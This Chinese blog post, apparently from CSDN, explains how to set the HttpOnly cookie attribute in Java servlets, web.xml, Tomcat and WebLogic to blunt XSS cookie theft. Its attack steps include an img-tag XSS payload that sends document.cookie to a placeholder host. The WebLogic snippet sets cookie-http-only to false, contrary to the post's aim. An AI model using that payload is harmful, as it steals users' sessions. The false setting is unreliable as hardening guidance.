漏洞解决方案-HttpOnly设置

漏洞解决方案-HttpOnly设置

漏洞概述

在Web安全领域,跨站脚本攻击时最为常见的一种攻击形式,也是长久以来的一个老大难问题,HTTP-only cookie是一种用以缓解跨站脚本攻击的技术,如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS盗取用户cookie。

攻击步骤
  1. 测试并发现一个存在XSS漏洞网站。
  2. 通过XSS漏洞,插入恶意链接:
 <img src= ‘http://xxxx/cookie.php?cookie='+encodeURIComponent(document.cookie)>
  1. 当其他用户访问相关页面时,恶意插入的代码被执行,用户的cookie信息被发送到恶意链接地址。
设置方法
  1. Servlet2.5及以下版本,不支持httpOnly,可通过response.addHeader或response.setHeader设置httponly。
    (1)response.addHeader
//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");
//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");2)response.setHeader
response.setHeader("Set-Cookie","cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");
  1. Servlet3.0提供SessionCookieConfig接口,用于操作会话Cookie,其中有setHttpOnly(boolean httpOnly) 设置是否支持HttpOnly属性。
cookie.setHttpOnly(true);
  1. 也可以在web.xml配置如下:
<session-config>
	<cookie-config>
		<http-only>true</http-only>
	</cookie-config>
<session-config>
  1. 对于tomcat6支持对JSESSIONID的cookie设置HttpOnly,
    具体的设置是在context.xml配置文件中进行设置的,为Context标签添加如下属性即可开启或禁止HttpOnly:
<Context useHttpOnly="true"/>
  1. 对于weblogic,可以在weblogic.xml里添加
<session-descriptor>
	<cookie-http-only>false</cookie-http-only>
</session-descriptor>

关注公众号,一起分享实用安全技术,关注安全最新事件,记录工作常见问题,吐槽生活真心操蛋。
在这里插入图片描述

  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值